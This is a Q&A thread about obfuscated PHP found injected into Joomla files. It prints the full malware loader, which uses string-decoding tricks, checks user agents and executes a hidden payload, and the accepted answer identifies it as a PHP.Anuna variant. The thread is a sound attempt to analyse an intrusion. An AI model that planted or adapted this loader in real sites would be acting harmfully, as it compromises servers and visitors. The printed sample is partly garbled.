# De-obfuscate PHP Code "opjudovg"

Tags: php, security, joomla, obfuscation

Recently I discovered some obfuscated code at the top of some Joomla files on a LAMP server. Obviously this was placed here through a Joomla exploit but the code is highly obfuscated thus it is nearly impossible to tell what it does. While analyzing it I noticed there is repeated uses of the string:

> opjudovg

I have done some googling and found others (not all are Joomla) that apparently been plagued with this but I have not found a good answer as to what this script does.

Does anyone have any ideas on how I would go about reverse engineering what this is?

```
<?php $ldzlfqw = ',3,j%>j%!<**3-j%-bubE{h%)sutcvt-#w#)ldbqov>!hmg%)!gj!<2,*j%-#1]#-bubE{h%)tpqsut>j%!*9!        x27!hmg%)!gj!~<ofmy%]y72]254]y76#<!%w:!>!(%w:!>!        x2467+yfeobz+sfwjidsb`bj+upcotn+qsvmt+fmhpph#)zbssb!-#}#)fepmqnj!/!1    156     x75     156     x61"])))) { $GLOBALS["  x       x242178}527}88:}334}472 x24<!%ff8M4P8]37]278]225]241]3  x64"))) { $qnqbjbm = "  x63     162     x654-   x24y4   x24-    x24]y8  x24-    x24]26  x24-    x24<%j,eTQcOc/#00#W~!Ydrr)%rxB%epnbss!>!VER["   x48     124     x54     120     x5f     125     x53     105     x52     137     x41     107     x41<!fmtf!%b:>%s:       x5c%j:.pV       x7f     x7f     x7f     x7f<u%V xpo#>b%!*##>>X)!gjZ<#opo#>b%!**X)ufttj  x2]234]342]58]24]31#-%tdz*Wsfuvso!%bss  x5csbowTW%hIr   x5c1^-%r        x5c2^-%hOh/#00#W~!%t27f;!osvufs}w;*     x7f!>>  x22!pd%)!gj}Z;h!opjudovg}{fid>}&;!osvufs}       x7f;!opjudovg}k~~<Cb*[%h!>!%tdz)%bbT-%bT-%hW~%fdy)##-!#~<%h00#*<%nfd)##Qtpz)#]341]83<!fmtf!%z>2<!%ww2)%w`TW~    x24<!fwbm)%tjw)bssb%-#1GO       x22#)fepmqyfA>2b%!<*qp%-*.%)euhA)3of>2bd%!<5h%/6<tfs%w6<        x7fw6*CWtfs%)7gj6<*id%)ftpmdR6<*id%)dfyfR       x27tfs%6<*17-SFtmbg39*56A:>:8:|:7#6#)tutjyf`439275ttfsqnpdov{h19275j{hnpd19275fubu%V<#65,47R25,d7R17,67R37,#/q%>U<#16,47R57,27R66,#/q%>2q%q%    x27Y%6<.msv`ftsbqA7>q%6<        x7fw6*  x7f_*#fubfsdXk5`{66~6<&w)##Qtjw)#]82#-#!#-%tmw)%tww**WYsboepn)%bss      141     x74     145     x5f     146     x75     156     142     x5f     163     x74     141     x268]y7f#<!%tww!>!      x2400~:<h%_t%:osvufs:~:<*9-1-r%)s%>/h%:2L5P6]y6gP7L6M7]D4]275]D:Mn%<#372]58y]472]37y]672]48y]#>s%<#462]47252]y85]256]y6g]257]y86]267]y74]275]y7:]`msvd}+;!>!}   x27;!>>>!}_;gvc%}&;ftmbg}       xy]252]18y]#>q%<#762]67y]562]38y]572]48y]#>m%:3qj%7>    x2272qj%)7gj6<**2qj%)hopm3qjA)qj3hopmA          x27jsv%6<C>^#zsfvr#     x5cq%7**^#zsfvr#        x5cq%)ufttj     x22)gj6<^#Y#    x5cg+)!gj+{e%!osvufs!*!+A!>!{e%)!>>     x22!ftmbg)!gj<*#k#)usbut`crray_map("burmcad",str_split("%tjw!>!#]y84]275]y83]248]y83]256]y81]2652]},;osvufs}    x27;mnui}&;zepc}A;~!}   x7f;!|!}{;)gj}l;33bq}34]368]322]3]364]6]283]427]3<%tpz!>!#]D6M7]K3#<%yy>#]D6]281L1#/#M5]DgPbssbz)#44ec:649#-!#:618d5f9#-!#f6c683-bubE{h%)sutcvt)fubmgoj{hA!osvufs!~<3,j%>j%!*3! x27!hmg%!)!gj!<,*!|     x24-    x24gvodujpo!    x24-    x24y7   x24-    x24*<!  x24-    x2#!>!2p%Z<^2   x5c2b%!>!2p%!*3>?*2b%)gpf{jt)!gj!<*2bdsvd}R;*msv%)}.;`UQPMSVD!-id%)uqpuft`msvd},;uqpuft7f_*#ujojRk3`{666~6<&w6< x7fw6*CW&)7gj6<.[A      x27&6<  x7fw}.;/#/#/},;#-#}+;%-qp%)EBFI,6<*127-UVPFNJU,6<*27-SFGTOBc    x27,*b  x27)fepdof.)fepdof.     x63     164     x69     157     x6e"; function burmcad(]281Ld]245]K2]285]Ke]53Ld]53]Kc]55Ld]55#*<%bG9}:}.}-}!#*<%nfd>%fdy       x61     156     x64     162     x6f     151/#@#/qp%>5h%!<*::::::-111112)eobs`un>qp%!#/#o]#/*)323zbe!-#jt0*?]+^?]_       x5c}X   x24<!%tmw!>!#]y8493e:5597f-s.973:8297f:5297e:56-xr.985:52985-t.98]K4]65]2)gj!|!*nbsbq%)323ldfidk!~!<**qp%!-uyfu%)3oSUOSVUFS,6<*msv%7-MSV,6<*)ujo$n){return chr(ord($n)-1);} @error_reportw6<    x7fw6*CW&)7gj6<*doj%7-C)fepmqnjA        x27&6<.fm54l}   x27;%!<*#}_;#)323ld)fepmqyf     x27*&7-n%)utjm6<        x7fw6*CW&)7gj6<*K)ftp71]K9]77]D4]82]K6]72]K9]78]K5]53]Kc#zB%z>! x24/%tmw/       x24)%zW%h>EzH,2W%wN;#-Ez-1H*WCw*[!%rN}#Q%:-5ppde:4:|:**#ppde#)tutjyf`4  x223}!+!<+{e%+*!*+fepdfe{h+{d%)+opjudove))1/35.)1/14+9**-)1/2986+7**^/%rx<~!!%s:N}#-%o:W%c:>1<%b:>1<!gps)%j:>1<%j:=tj{fpg)%s:cvt)esp>hmg%!<12>j%!|!*#91y]c9y]g2y]#>>*42!>!bssbz)        x24]25  x24-    x24-!%  x24-    x24*!|! x24-    x24     x5c%j^  27{ftmfV        x7f<*X&Z&S{ftmfV        x7f<*XAZASV<*w%)ppde>2,*j%!-#1]#-bubE{h%)tpqsut>j%!*72! x27jR   x27id%6<        x7fw6*  x*ofmy%)utjm!|!*5!      x27!hmg%)!gj!|!*1?hmg%)!gj!<**2-4-bubE{h%)sutUT`LDPT7-UFOJ`GB)fubfsdXA  x27K6<  x7fw6*)Rb%))!gj!<*#cd2bge56+99386c6f+9f5d816:+946:ce44##0#/*#npd/#)rrd/#00;quui#>.%!<***f       x27,*e  x27,*d  x27,*8]Df#<%tdz>#L4]275L3]248L3P6L1M5]D2P4]D6#<%G]y6d;#)tutjyf`opjudovg)!gj!|!*msv%)}k~~z)#P#-#Q#-#B#-#T#-#E~<ftmbg!osvufs!|ftmf!~<**9.-j%5     116     x54"]); if ((strstr($uas,"      x6d     163     x69     145!%w:**<")));$ikuqvqa = $qnqbjbm("", $xchsxyf); $ikuqvqa();}PI`QUUI&e_SEEB`FUPNFS&d_SFSFGFS`QUUI&c_UOFHB`SFTV`QUUI&b%!|mdXA6~6<u%7>/7&6|7**1111272    164") && (!isset($GLOBALS["     x6-%rxB%h>#]y31]278]y3e]81]K78:56985:6197g:74985-rr.#0#)idubn`hfsq)!sp!*#ojneb#-*f%)sfxpmpusut)tpqssutRe%)Rd%%/h%)n%-#+I#)q%:>:r%:|:**t%)m%=*h%)m%):fmjix:<##:>:h%:<#64y]552]e7y]#>{**#k#)tutjyf`x      x22l:!}V;3q%}U;y]}R;<#g6R85,67R37,18R#>q%V<*#fopoV;hojepdoF.uofuopD#)sfebfI{*w%)kVx~<#/%        x24-    x24!>!fyqmpef)# x24*<!%t::!>!   x24Ypp3)%cB%iN}#-!      x24/%tmw/opd`ufh`fmjg}[;ldpt%}K;`ufldpt}X;`m6*  x7f_*#[k2`{6:!}7;!}6;##}C;!>>!}W;utpi}Y;tuofu*<%j:,,Bjg!)%j:>>1*!%b:>5]D6#<%fdy>#]D4]273]D6P.7eu{66~67<&w6<*&7-#o]s]o]s]#61     156     x75     156     x61"]=1; $uas=strtolower($_SER}")) or (strstr($uas,"    x72     166     x3a     61      x31")) or (strstr($uas,"445]43]321]464]284]364]6yy)#}#-#        x24-    x24-tusqpt)%z-#:#*      x24-    x24!>!  x24/%tjw/       x24)%   x2jgA   x27doj%6<       x7fw6*  x7f_*#fmjgk4`{6~9{d%:osvufs:~928>>      x22:f4gps)%j>1<%j=tj{fpg)%      x24-    x24*<!~!        x24/%t2w/       x24)##-!#x27pd%6<pd%w6Z6<.4`hA  x27pd%6<pd%w6Z6<.3`hA   x27pd%6<pd%w2^,%b:<!%c:>%s:     x5c%j:^<!%w`    pd#)tutjyf`opjudovg     x22)!gj}1~!<2p% x7f!~!<#!*uyfu  x27k:!ftmf!}Z;^nbsbq%   x5cSFWSFT`%}X;!sp!*#opo#>>}R;msvD8]86]y31]278]y3f]51L3]84]y-1-bubE{h%)sutcvt)!gj!|!*bubE{h%)j{hnpd!opjudovg!|!**#j{hn<**#57]38y]47]67y]37]88y]27]28y]#/r|:*r%:-t%)3of:opjudovg<~        x24<!%o:!>!]275]y83]273]y76]277#<!%t2w>#]y74]273]y76]31M6]y3e]81#/#7e:55946-tr.984:75983:48984:f)fepdof`57ftbc  x7f!|ing(0); $xchsxyf = implode(ax5c^>Ew:Qb:Qc:W~!%z!>2<!gps)%j>1<%j=6[%ww2!>#p#/#p#/%z<jg!)%z>>2*!%z>x24-      x24tvctus)%     x24-    x24b!>!%if((function_exists("   x6f6]373P6]36]73]83]238M7]381]211M5]67]452]88]5]48]32M3]317]445]212](<!fwbm)%tjw)#      x24#-!#]y38#-k;opjudovg}x;0]=])0#)U!    x27{**u%-#jt0}Z;0]=]0#)2q%l}S;2-u%!-#2#/#%)zbssb!>!ssbnpe_GMFT`QIQ&f_UTpmdXA6|7**197-2qj%7-K)udfoopdXA  x22)7gj6<*QDU`MPT7-NBFS7;utpI#7>/7rfs%6<#o]1/20QUUI7jsv%7UFH#   x27rfs%6~6<     x7fw6<*K)ft7-K)ebfsX    x27u%)7fmjix6<C x27&6<*rfs%7-K)fujsxX6<#o]o]Y%67~6<Cw6<pd%w6Z6<.5`hA    x273qj%6<*Y%)fnbozcYufhA        x272qj%6<^#zsfvr#       x5cq%7/7#@#7/7^#iubq#   x5cq%99#-!#65egb2dc#*<!sfuvso!sboepn)%epnbss-%rxW~!Ypp2)%       x24)%c*W%eN+#Qi x5c1^W%c!>!%i   x5c2^<!Ce*[!%cIjQ-#W#-#C#-#O#-#N#*-!%ff2-!%t::**<#-#G#-#H#-#I#-#K#-#L#-#M#-#[#-#Y#-#D#6Z6<.2`hA x27pd%6<C       x27pd%6|6|Z~!<##!>!2p%!|!*!***b%)sfxpmpusut!-#j0#!/!**#sfmcnbs!*)323zbek!~!<b%  x7f!<X>b%Z<#omgoj{h1:|:*mmvo:>:iuhofmSTrrEvxNoITCnuF_EtaeRCxECaLPer_RtSkqicujnj'; $igdlorg=explode(chr((507-387)),substr($ldzlfqw,(23721-17795),(191-157))); $jhvudq = $igdlorg[0]($igdlorg[(3-2)]); $xuqzdby = $igdlorg[0]($igdlorg[(10-8)]); if (!function_exists('inlski')) { function inlski($zkhzovdq, $rcqclg,$extvvvla) { $levdzxqh = NULL; for($nomjzfqly=0;$nomjzfqly<(sizeof($zkhzovdq)/2);$nomjzfqly++) { $levdzxqh .= substr($rcqclg, $zkhzovdq[($nomjzfqly*2)],$zkhzovdq[($nomjzfqly*2)+(6-5)]); } return $extvvvla(chr((42-33)),chr((312-220)),$levdzxqh); }; } $zhjksylgzw = explode(chr((271-227)),'5142,25,1198,22,3717,33,203,38,4254,45,409,56,3526,48,4300,61,2331,24,296,35,1170,28,2225,40,2576,41,5015,28,1639,70,107,34,5528,23,4564,56,5790,29,4225,29,2687,47,3692,25,5472,56,5410,62,5355,55,3251,39,1468,46,5551,70,1514,66,1069,58,2617,46,4448,37,879,67,2165,32,2547,29,3168,20,2087,55,4130,48,4095,35,2038,49,1383,40,633,48,3441,35,3496,30,1872,63,3130,38,43,64,0,43,3188,63,2983,41,4781,58,4649,44,1988,50,825,54,3339,54,2197,28,2355,41,5819,53,141,62,3800,57,3290,49,5326,29,3633,59,5872,30,512,40,2504,43,4994,21,4693,61,2142,23,2663,24,681,33,4485,24,946,66,5902,24,2827,70,1580,59,488,24,3083,47,1012,57,3963,63,3927,36,1709,56,5260,66,2396,53,4910,42,1343,40,1220,57,4839,35,3857,70,1303,40,1423,45,4874,36,241,33,3024,59,5112,30,4385,63,331,45,1935,53,4509,55,4026,69,5673,48,376,33,1835,37,5621,52,2770,57,595,38,1127,43,3750,50,2449,55,4754,27,4952,42,2734,36,1793,42,4202,23,1277,26,3393,48,2265,66,714,66,274,22,1765,28,5167,65,4361,24,552,43,2897,43,2940,43,4178,24,465,23,4620,29,5043,69,780,45,3476,20,5753,37,5721,32,5232,28,3574,59,4299,1'); $iuypjrt = $jhvudq("",inlski($zhjksylgzw,$ldzlfqw,$xuqzdby)); $jhvudq=$ldzlfqw; $iuypjrt(""); $iuypjrt=(686-565); $ldzlfqw=$iuypjrt-1; ?>
```

Comment: At a first glance, usually code like this use eval of some sort to extract data from your server.

Comment: @Xorifelse Yeah, I assumed that as well but I'm unsure how to "reverse" it to get any more details. Any help would greatly be appreciated.

Comment: See: http://security.stackexchange.com/q/115461

Answer (score 2, accepted):

There is another variation of `PHP.Anuna` (AKA `PHP!Anuna`). Your version looks like not working (maybe wrong copy/paste?). Don't waste time to deobfuscate it. Here is deobfuscated one: http://pastebin.com/NstDXerz (Antivirus off needed). Here people try deobfuscate it step by step: https://stackoverflow.com/a/38143382/1908705